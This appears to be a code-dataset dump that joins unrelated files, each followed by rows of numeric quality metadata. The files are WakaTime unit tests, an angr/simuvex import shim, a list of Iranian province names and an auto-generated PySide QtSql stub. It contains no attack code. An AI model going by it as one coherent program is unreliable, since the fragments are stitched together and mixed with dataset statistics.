self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_called_once_with(
ANY, cert=None, proxies={}, stream=False, timeout=60, verify=True,
)
@log_capture()
def test_invalid_api_key(self, logs):
logging.disable(logging.NOTSET)
response = Response()
response.status_code = 201
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
config = 'tests/samples/configs/missing_api_key.cfg'
args = ['--config', config, '--key', 'invalid-api-key']
with self.assertRaises(SystemExit) as e:
execute(args)
self.assertEquals(int(str(e.exception)), AUTH_ERROR)
self.assertEquals(sys.stdout.getvalue(), '')
expected = 'error: Invalid api key. Find your api key from wakatime.com/settings.'
self.assertIn(expected, sys.stderr.getvalue())
log_output = u("\n").join([u(' ').join(x) for x in logs.actual()])
expected = ''
self.assertEquals(log_output, expected)
self.patched['wakatime.session_cache.SessionCache.get'].assert_not_called()
self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_not_called()
def test_nonascii_hostname(self):
response = Response()
response.status_code = 201
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
with utils.TemporaryDirectory() as tempdir:
entity = 'tests/samples/codefiles/emptyfile.txt'
shutil.copy(entity, os.path.join(tempdir, 'emptyfile.txt'))
entity = os.path.realpath(os.path.join(tempdir, 'emptyfile.txt'))
hostname = 'test汉语' if is_py3 else 'test\xe6\xb1\x89\xe8\xaf\xad'
with utils.mock.patch('socket.gethostname') as mock_gethostname:
mock_gethostname.return_value = hostname
self.assertEquals(type(hostname).__name__, 'str')
config = 'tests/samples/configs/good_config.cfg'
args = ['--file', entity, '--config', config]
retval = execute(args)
self.assertEquals(retval, SUCCESS)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
self.patched['wakatime.session_cache.SessionCache.save'].assert_called_once_with(ANY)
self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.pop'].assert_called_once_with()
headers = self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].call_args[0][0].headers
self.assertEquals(headers.get('X-Machine-Name'), hostname.encode('utf-8') if is_py3 else hostname)
def test_nonascii_timezone(self):
response = Response()
response.status_code = 201
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
with utils.TemporaryDirectory() as tempdir:
entity = 'tests/samples/codefiles/emptyfile.txt'
shutil.copy(entity, os.path.join(tempdir, 'emptyfile.txt'))
entity = os.path.realpath(os.path.join(tempdir, 'emptyfile.txt'))
class TZ(object):
@property
def zone(self):
return 'tz汉语' if is_py3 else 'tz\xe6\xb1\x89\xe8\xaf\xad'
timezone = TZ()
with utils.mock.patch('wakatime.packages.tzlocal.get_localzone') as mock_getlocalzone:
mock_getlocalzone.return_value = timezone
config = 'tests/samples/configs/has_everything.cfg'
args = ['--file', entity, '--config', config, '--timeout', '15']
retval = execute(args)
self.assertEquals(retval, SUCCESS)
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
self.patched['wakatime.session_cache.SessionCache.save'].assert_called_once_with(ANY)
self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.pop'].assert_called_once_with()
headers = self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].call_args[0][0].headers
self.assertEquals(headers.get('TimeZone'), u(timezone.zone).encode('utf-8') if is_py3 else timezone.zone)
def test_timezone_with_invalid_encoding(self):
response = Response()
response.status_code = 201
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
with utils.TemporaryDirectory() as tempdir:
entity = 'tests/samples/codefiles/emptyfile.txt'
shutil.copy(entity, os.path.join(tempdir, 'emptyfile.txt'))
entity = os.path.realpath(os.path.join(tempdir, 'emptyfile.txt'))
class TZ(object):
@property
def zone(self):
return bytes('\xab', 'utf-16') if is_py3 else '\xab'
timezone = TZ()
with self.assertRaises(UnicodeDecodeError):
timezone.zone.decode('utf8')
with utils.mock.patch('wakatime.packages.tzlocal.get_localzone') as mock_getlocalzone:
mock_getlocalzone.return_value = timezone
config = 'tests/samples/configs/has_everything.cfg'
args = ['--file', entity, '--config', config, '--timeout', '15']
retval = execute(args)
self.assertEquals(retval, SUCCESS)
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
self.patched['wakatime.session_cache.SessionCache.save'].assert_called_once_with(ANY)
self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.pop'].assert_called_once_with()
headers = self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].call_args[0][0].headers
expected_tz = u(bytes('\xab', 'utf-16') if is_py3 else '\xab').encode('utf-8')
self.assertEquals(headers.get('TimeZone'), expected_tz)
def test_tzlocal_exception(self):
response = Response()
response.status_code = 201
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
with utils.TemporaryDirectory() as tempdir:
entity = 'tests/samples/codefiles/emptyfile.txt'
shutil.copy(entity, os.path.join(tempdir, 'emptyfile.txt'))
entity = os.path.realpath(os.path.join(tempdir, 'emptyfile.txt'))
with utils.mock.patch('wakatime.packages.tzlocal.get_localzone') as mock_getlocalzone:
mock_getlocalzone.side_effect = Exception('tzlocal exception')
config = 'tests/samples/configs/has_everything.cfg'
args = ['--file', entity, '--config', config, '--timeout', '15']
retval = execute(args)
self.assertEquals(retval, SUCCESS)
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
self.patched['wakatime.session_cache.SessionCache.save'].assert_called_once_with(ANY)
self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.pop'].assert_called_once_with()
headers = self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].call_args[0][0].headers
self.assertEquals(headers.get('TimeZone'), None)
def test_timezone_header(self):
response = Response()
response.status_code = 201
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
with utils.TemporaryDirectory() as tempdir:
entity = 'tests/samples/codefiles/emptyfile.txt'
shutil.copy(entity, os.path.join(tempdir, 'emptyfile.txt'))
entity = os.path.realpath(os.path.join(tempdir, 'emptyfile.txt'))
config = 'tests/samples/configs/good_config.cfg'
args = ['--file', entity, '--config', config]
retval = execute(args)
self.assertEquals(retval, SUCCESS)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
self.patched['wakatime.session_cache.SessionCache.save'].assert_called_once_with(ANY)
self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.pop'].assert_called_once_with()
timezone = tzlocal.get_localzone()
headers = self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].call_args[0][0].headers
self.assertEquals(headers.get('TimeZone'), u(timezone.zone).encode('utf-8') if is_py3 else timezone.zone)
@log_capture()
def test_nonascii_filename(self, logs):
logging.disable(logging.NOTSET)
response = Response()
response.status_code = 0
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
with utils.TemporaryDirectory() as tempdir:
filename = list(filter(lambda x: x.endswith('.txt'), os.listdir(u('tests/samples/codefiles/unicode'))))[0]
entity = os.path.join('tests/samples/codefiles/unicode', filename)
shutil.copy(entity, os.path.join(tempdir, filename))
entity = os.path.realpath(os.path.join(tempdir, filename))
now = u(int(time.time()))
config = 'tests/samples/configs/good_config.cfg'
key = str(uuid.uuid4())
args = ['--file', entity, '--key', key, '--config', config, '--time', now]
retval = execute(args)
self.assertEquals(retval, API_ERROR)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
log_output = u("\n").join([u(' ').join(x) for x in logs.actual()])
self.assertEquals(log_output, '')
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
heartbeat = {
'language': 'Text only',
'lines': 0,
'entity': os.path.realpath(entity),
'project': os.path.basename(os.path.abspath('.')),
'time': float(now),
'type': 'file',
}
stats = {
u('cursorpos'): None,
u('dependencies'): [],
u('language'): u('Text only'),
u('lineno'): None,
u('lines'): 0,
}
self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(ANY, ANY, None)
for key, val in self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][0].items():
self.assertEquals(heartbeat[key], val)
self.assertEquals(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_called_once_with(
ANY, cert=None, proxies={}, stream=False, timeout=60, verify=True,
)
@log_capture()
def test_unhandled_exception(self, logs):
logging.disable(logging.NOTSET)
with utils.mock.patch('wakatime.main.process_heartbeat') as mock_process_heartbeat:
ex_msg = 'testing unhandled exception'
mock_process_heartbeat.side_effect = RuntimeError(ex_msg)
entity = 'tests/samples/codefiles/twolinefile.txt'
config = 'tests/samples/configs/good_config.cfg'
key = str(uuid.uuid4())
args = ['--entity', entity, '--key', key, '--config', config]
execute(args)
self.assertIn(ex_msg, sys.stdout.getvalue())
self.assertEquals(sys.stderr.getvalue(), '')
log_output = u("\n").join([u(' ').join(x) for x in logs.actual()])
self.assertIn(ex_msg, log_output)
self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
self.patched['wakatime.session_cache.SessionCache.get'].assert_not_called()
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_not_called()
def test_large_file_skips_lines_count(self):
response = Response()
response.status_code = 0
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
entity = 'tests/samples/codefiles/twolinefile.txt'
config = 'tests/samples/configs/good_config.cfg'
now = u(int(time.time()))
args = ['--entity', entity, '--config', config, '--time', now]
with utils.mock.patch('os.path.getsize') as mock_getsize:
mock_getsize.return_value = MAX_FILE_SIZE_SUPPORTED + 1
retval = execute(args)
self.assertEquals(retval, API_ERROR)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
heartbeat = {
'language': 'Text only',
'lines': None,
'entity': os.path.realpath(entity),
'project': os.path.basename(os.path.abspath('.')),
'cursorpos': None,
'lineno': None,
'branch': 'master',
'time': float(now),
'type': 'file',
}
stats = {
u('cursorpos'): None,
u('dependencies'): [],
u('language'): u('Text only'),
u('lineno'): None,
u('lines'): None,
}
self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(ANY, ANY, None)
for key, val in self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][0].items():
self.assertEquals(heartbeat[key], val)
self.assertEquals(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_called_once_with(
ANY, cert=None, proxies={}, stream=False, timeout=60, verify=True,
)
| 47.025994 | 129 | 0.622143 | 3,324 | 30,755 | 5.620638 | 0.0716 | 0.065942 | 0.1139 | 0.080501 | 0.875288 | 0.85816 | 0.848311 | 0.831558 | 0.819515 | 0.814377 | 0 | 0.00704 | 0.242562 | 30,755 | 653 | 130 | 47.098009 | 0.794977 | 0.000683 | 0 | 0.748077 | 0 | 0 | 0.271606 | 0.200508 | 0 | 0 | 0 | 0 | 0.282692 | 1 | 0.032692 | false | 0 | 0.040385 | 0.003846 | 0.084615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
06e2332b06a7786eda26f7cd9bcabd60c125b78e | 102 | py | Python | simuvex/simuvex/plugins/fast_memory.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 86 | 2015-08-06T23:25:07.000Z | 2022-02-17T14:58:22.000Z | simuvex/simuvex/plugins/fast_memory.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 132 | 2015-09-10T19:06:59.000Z | 2018-10-04T20:36:45.000Z | simuvex/simuvex/plugins/fast_memory.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 80 | 2015-08-07T10:30:20.000Z | 2020-03-21T14:45:28.000Z | print '... Importing simuvex/plugins/fast_memory.py ...'
from angr.state_plugins.fast_memory import *
| 34 | 56 | 0.77451 | 14 | 102 | 5.428571 | 0.785714 | 0.289474 | 0.447368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 102 | 2 | 57 | 51 | 0.817204 | 0 | 0 | 0 | 0 | 0 | 0.470588 | 0.294118 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 1 | null | null | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
b08c84b220571776b1422516a7f07b8f9649e346 | 84 | py | Python | aws/main.py | whelmed/boston_serverless_meetup | 1cf405e6b28b38e68bb2844574d2e9fd62efb862 | [
"MIT"
] | null | null | null | aws/main.py | whelmed/boston_serverless_meetup | 1cf405e6b28b38e68bb2844574d2e9fd62efb862 | [
"MIT"
] | null | null | null | aws/main.py | whelmed/boston_serverless_meetup | 1cf405e6b28b38e68bb2844574d2e9fd62efb862 | [
"MIT"
] | null | null | null | from api.tweet.get import handler as get
from api.tweet.post import handler as post
| 28 | 42 | 0.809524 | 16 | 84 | 4.25 | 0.5 | 0.205882 | 0.352941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 84 | 2 | 43 | 42 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9ff7c86e37b9f9a3090e1d184fe587aacac905a6 | 1,934 | py | Python | bot/Utils/States.py | ehsanbarkhordar/bot_141 | 6104411339a2607efe477077e9ddab6c441573da | [
"Apache-2.0"
] | null | null | null | bot/Utils/States.py | ehsanbarkhordar/bot_141 | 6104411339a2607efe477077e9ddab6c441573da | [
"Apache-2.0"
] | null | null | null | bot/Utils/States.py | ehsanbarkhordar/bot_141 | 6104411339a2607efe477077e9ddab6c441573da | [
"Apache-2.0"
] | null | null | null | states_names = ["AzarbayjanSharghi", "AzarbayjanGharbi", "Ardebil", "Esfehan", "Alborz", "Ilam", "Boshehr", "tehran",
"chaharmahalbakhtiari", "KhorasanJonoobi",
"KhorasanRazavi", "KhorasanShomali", "Khozestan", "Zanjan", "Semnan", "SistanBalochestan", "Fars",
"Ghazvin", "qom", "Kordestan",
"Kerman", "KermanShah", "kohkilooyehVaBoyerAhmad", "Golestan", "Gilan", "Lorestan", "Mazandaran",
"Markazi", "Hormozgan", "Hamedan", "Yazd"]
states_views = ["آذربایجانشرقی", "آذربایجانغربی", "اردبیل", "اصفهان",
"البرز", "ایلام", "بوشهر", "تهران", "چهارمحالبختیاری",
"خراسانجنوبی", "خراسانرضوی", "خراسانشمالی", "خوزستان", "زنجان",
"سمنان", "سیستانوبلوچستان", "فارس", "قزوین", "قم", "کردستان", "کرمان",
"کرمانشاه", "کهکیلویهوبویراحمد", "گلستان", "گیلان", "لرستان", "مازندران",
"مرکزی", "هرمزگان", "همدان", "یزد"]
class States:
states_names = ["AzarbayjanSharghi", "AzarbayjanGharbi", "Ardebil", "Esfehan", "Alborz", "Ilam", "Boshehr",
"tehran",
"chaharmahalbakhtiari", "KhorasanJonoobi",
"KhorasanRazavi", "KhorasanShomali", "Khozestan", "Zanjan", "Semnan", "SistanBalochestan", "Fars",
"Ghazvin", "qom", "Kordestan",
"Kerman", "KermanShah", "kohkilooyehVaBoyerAhmad", "Golestan", "Gilan", "Lorestan", "Mazandaran",
"Markazi", "Hormozgan", "Hamedan", "Yazd"]
states_views = ["آذربایجانشرقی", "آذربایجانغربی", "اردبیل", "اصفهان",
"البرز", "ایلام", "بوشهر", "تهران", "چهارمحالبختیاری",
"خراسانجنوبی", "خراسانرضوی", "خراسانشمالی", "خوزستان", "زنجان",
"سمنان", "سیستانوبلوچستان", "فارس", "قزوین", "قم", "کردستان", "کرمان",
"کرمانشاه", "کهکیلویهوبویراحمد", "گلستان", "گیلان", "لرستان", "مازندران",
"مرکزی", "هرمزگان", "همدان", "یزد"]
| 49.589744 | 118 | 0.570321 | 166 | 1,934 | 6.716867 | 0.433735 | 0.037668 | 0.050224 | 0.078924 | 0.990135 | 0.990135 | 0.990135 | 0.990135 | 0.990135 | 0.990135 | 0 | 0 | 0.224405 | 1,934 | 38 | 119 | 50.894737 | 0.732667 | 0 | 0 | 0.846154 | 0 | 0 | 0.550363 | 0.023884 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c694ca06c32b5537133007532f05726129c2dec7 | 37,775 | py | Python | resources/dot_PyCharm/system/python_stubs/-762174762/PySide/QtSql.py | basepipe/developer_onboarding | 05b6a776f8974c89517868131b201f11c6c2a5ad | [
"MIT"
] | 1 | 2020-04-20T02:27:20.000Z | 2020-04-20T02:27:20.000Z | resources/dot_PyCharm/system/python_stubs/cache/b187d1132e7eb3c246068580bb9c6db99581945459c2ea08b49263404fd1b91f/PySide/QtSql.py | basepipe/developer_onboarding | 05b6a776f8974c89517868131b201f11c6c2a5ad | [
"MIT"
] | null | null | null | resources/dot_PyCharm/system/python_stubs/cache/b187d1132e7eb3c246068580bb9c6db99581945459c2ea08b49263404fd1b91f/PySide/QtSql.py | basepipe/developer_onboarding | 05b6a776f8974c89517868131b201f11c6c2a5ad | [
"MIT"
] | null | null | null | # encoding: utf-8
# module PySide.QtSql
# from C:\Python27\lib\site-packages\PySide\QtSql.pyd
# by generator 1.147
# no doc
# imports
import PySide.QtCore as __PySide_QtCore
import PySide.QtGui as __PySide_QtGui
import Shiboken as __Shiboken
# no functions
# classes
class QSql(__Shiboken.Object):
# no doc
def __init__(self, *args, **kwargs): # real signature unknown
pass
AfterLastRow = PySide.QtSql.QSql.Location.AfterLastRow
AllTables = PySide.QtSql.QSql.TableType.AllTables
BeforeFirstRow = PySide.QtSql.QSql.Location.BeforeFirstRow
Binary = PySide.QtSql.QSql.ParamTypeFlag.Binary
HighPrecision = PySide.QtSql.QSql.NumericalPrecisionPolicy.HighPrecision
In = PySide.QtSql.QSql.ParamTypeFlag.In
InOut = PySide.QtSql.QSql.ParamTypeFlag.InOut
Location = None # (!) real value is "<type 'PySide.QtSql.QSql.Location'>"
LowPrecisionDouble = PySide.QtSql.QSql.NumericalPrecisionPolicy.LowPrecisionDouble
LowPrecisionInt32 = PySide.QtSql.QSql.NumericalPrecisionPolicy.LowPrecisionInt32
LowPrecisionInt64 = PySide.QtSql.QSql.NumericalPrecisionPolicy.LowPrecisionInt64
NumericalPrecisionPolicy = None # (!) real value is "<type 'PySide.QtSql.QSql.NumericalPrecisionPolicy'>"
Out = PySide.QtSql.QSql.ParamTypeFlag.Out
ParamType = None # (!) real value is "<type 'ParamType'>"
ParamTypeFlag = None # (!) real value is "<type 'PySide.QtSql.QSql.ParamTypeFlag'>"
SystemTables = PySide.QtSql.QSql.TableType.SystemTables
Tables = PySide.QtSql.QSql.TableType.Tables
TableType = None # (!) real value is "<type 'PySide.QtSql.QSql.TableType'>"
Views = PySide.QtSql.QSql.TableType.Views
class QSqlDatabase(__Shiboken.Object):
# no doc
def addDatabase(self, *args, **kwargs): # real signature unknown
pass
def cloneDatabase(self, *args, **kwargs): # real signature unknown
pass
def close(self, *args, **kwargs): # real signature unknown
pass
def commit(self, *args, **kwargs): # real signature unknown
pass
def connectionName(self, *args, **kwargs): # real signature unknown
pass
def connectionNames(self, *args, **kwargs): # real signature unknown
pass
def connectOptions(self, *args, **kwargs): # real signature unknown
pass
def contains(self, *args, **kwargs): # real signature unknown
pass
def database(self, *args, **kwargs): # real signature unknown
pass
def databaseName(self, *args, **kwargs): # real signature unknown
pass
def driver(self, *args, **kwargs): # real signature unknown
pass
def driverName(self, *args, **kwargs): # real signature unknown
pass
def drivers(self, *args, **kwargs): # real signature unknown
pass
def exec_(self, *args, **kwargs): # real signature unknown
pass
def hostName(self, *args, **kwargs): # real signature unknown
pass
def isDriverAvailable(self, *args, **kwargs): # real signature unknown
pass
def isOpen(self, *args, **kwargs): # real signature unknown
pass
def isOpenError(self, *args, **kwargs): # real signature unknown
pass
def isValid(self, *args, **kwargs): # real signature unknown
pass
def lastError(self, *args, **kwargs): # real signature unknown
pass
def numericalPrecisionPolicy(self, *args, **kwargs): # real signature unknown
pass
def open(self, *args, **kwargs): # real signature unknown
pass
def password(self, *args, **kwargs): # real signature unknown
pass
def port(self, *args, **kwargs): # real signature unknown
pass
def primaryIndex(self, *args, **kwargs): # real signature unknown
pass
def record(self, *args, **kwargs): # real signature unknown
pass
def registerSqlDriver(self, *args, **kwargs): # real signature unknown
pass
def removeDatabase(self, *args, **kwargs): # real signature unknown
pass
def rollback(self, *args, **kwargs): # real signature unknown
pass
def setConnectOptions(self, *args, **kwargs): # real signature unknown
pass
def setDatabaseName(self, *args, **kwargs): # real signature unknown
pass
def setHostName(self, *args, **kwargs): # real signature unknown
pass
def setNumericalPrecisionPolicy(self, *args, **kwargs): # real signature unknown
pass
def setPassword(self, *args, **kwargs): # real signature unknown
pass
def setPort(self, *args, **kwargs): # real signature unknown
pass
def setUserName(self, *args, **kwargs): # real signature unknown
pass
def tables(self, *args, **kwargs): # real signature unknown
pass
def transaction(self, *args, **kwargs): # real signature unknown
pass
def userName(self, *args, **kwargs): # real signature unknown
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
defaultConnection = 'qt_sql_default_connection'
class QSqlDriver(__PySide_QtCore.QObject):
# no doc
def beginTransaction(self, *args, **kwargs): # real signature unknown
pass
def close(self, *args, **kwargs): # real signature unknown
pass
def commitTransaction(self, *args, **kwargs): # real signature unknown
pass
def createResult(self, *args, **kwargs): # real signature unknown
pass
def escapeIdentifier(self, *args, **kwargs): # real signature unknown
pass
def formatValue(self, *args, **kwargs): # real signature unknown
pass
def hasFeature(self, *args, **kwargs): # real signature unknown
pass
def isIdentifierEscaped(self, *args, **kwargs): # real signature unknown
pass
def isIdentifierEscapedImplementation(self, *args, **kwargs): # real signature unknown
pass
def isOpen(self, *args, **kwargs): # real signature unknown
pass
def isOpenError(self, *args, **kwargs): # real signature unknown
pass
def lastError(self, *args, **kwargs): # real signature unknown
pass
def notification(self, *args, **kwargs): # real signature unknown
""" Signal """
pass
def numericalPrecisionPolicy(self, *args, **kwargs): # real signature unknown
pass
def open(self, *args, **kwargs): # real signature unknown
pass
def primaryIndex(self, *args, **kwargs): # real signature unknown
pass
def record(self, *args, **kwargs): # real signature unknown
pass
def rollbackTransaction(self, *args, **kwargs): # real signature unknown
pass
def setLastError(self, *args, **kwargs): # real signature unknown
pass
def setNumericalPrecisionPolicy(self, *args, **kwargs): # real signature unknown
pass
def setOpen(self, *args, **kwargs): # real signature unknown
pass
def setOpenError(self, *args, **kwargs): # real signature unknown
pass
def sqlStatement(self, *args, **kwargs): # real signature unknown
pass
def stripDelimiters(self, *args, **kwargs): # real signature unknown
pass
def stripDelimitersImplementation(self, *args, **kwargs): # real signature unknown
pass
def subscribedToNotifications(self, *args, **kwargs): # real signature unknown
pass
def subscribedToNotificationsImplementation(self, *args, **kwargs): # real signature unknown
pass
def subscribeToNotification(self, *args, **kwargs): # real signature unknown
pass
def subscribeToNotificationImplementation(self, *args, **kwargs): # real signature unknown
pass
def tables(self, *args, **kwargs): # real signature unknown
pass
def unsubscribeFromNotification(self, *args, **kwargs): # real signature unknown
pass
def unsubscribeFromNotificationImplementation(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
BatchOperations = PySide.QtSql.QSqlDriver.DriverFeature.BatchOperations
BLOB = PySide.QtSql.QSqlDriver.DriverFeature.BLOB
DeleteStatement = PySide.QtSql.QSqlDriver.StatementType.DeleteStatement
DriverFeature = None # (!) real value is "<type 'PySide.QtSql.QSqlDriver.DriverFeature'>"
EventNotifications = PySide.QtSql.QSqlDriver.DriverFeature.EventNotifications
FieldName = PySide.QtSql.QSqlDriver.IdentifierType.FieldName
FinishQuery = PySide.QtSql.QSqlDriver.DriverFeature.FinishQuery
IdentifierType = None # (!) real value is "<type 'PySide.QtSql.QSqlDriver.IdentifierType'>"
InsertStatement = PySide.QtSql.QSqlDriver.StatementType.InsertStatement
LastInsertId = PySide.QtSql.QSqlDriver.DriverFeature.LastInsertId
LowPrecisionNumbers = PySide.QtSql.QSqlDriver.DriverFeature.LowPrecisionNumbers
MultipleResultSets = PySide.QtSql.QSqlDriver.DriverFeature.MultipleResultSets
NamedPlaceholders = PySide.QtSql.QSqlDriver.DriverFeature.NamedPlaceholders
PositionalPlaceholders = PySide.QtSql.QSqlDriver.DriverFeature.PositionalPlaceholders
PreparedQueries = PySide.QtSql.QSqlDriver.DriverFeature.PreparedQueries
QuerySize = PySide.QtSql.QSqlDriver.DriverFeature.QuerySize
SelectStatement = PySide.QtSql.QSqlDriver.StatementType.SelectStatement
SimpleLocking = PySide.QtSql.QSqlDriver.DriverFeature.SimpleLocking
StatementType = None # (!) real value is "<type 'PySide.QtSql.QSqlDriver.StatementType'>"
staticMetaObject = None # (!) real value is '<PySide.QtCore.QMetaObject object at 0x000000000476BB48>'
TableName = PySide.QtSql.QSqlDriver.IdentifierType.TableName
Transactions = PySide.QtSql.QSqlDriver.DriverFeature.Transactions
Unicode = PySide.QtSql.QSqlDriver.DriverFeature.Unicode
UpdateStatement = PySide.QtSql.QSqlDriver.StatementType.UpdateStatement
WhereStatement = PySide.QtSql.QSqlDriver.StatementType.WhereStatement
class QSqlDriverCreatorBase(__Shiboken.Object):
# no doc
def createObject(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class QSqlError(__Shiboken.Object):
# no doc
def databaseText(self, *args, **kwargs): # real signature unknown
pass
def driverText(self, *args, **kwargs): # real signature unknown
pass
def isValid(self, *args, **kwargs): # real signature unknown
pass
def number(self, *args, **kwargs): # real signature unknown
pass
def setDatabaseText(self, *args, **kwargs): # real signature unknown
pass
def setDriverText(self, *args, **kwargs): # real signature unknown
pass
def setNumber(self, *args, **kwargs): # real signature unknown
pass
def setType(self, *args, **kwargs): # real signature unknown
pass
def text(self, *args, **kwargs): # real signature unknown
pass
def type(self, *args, **kwargs): # real signature unknown
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
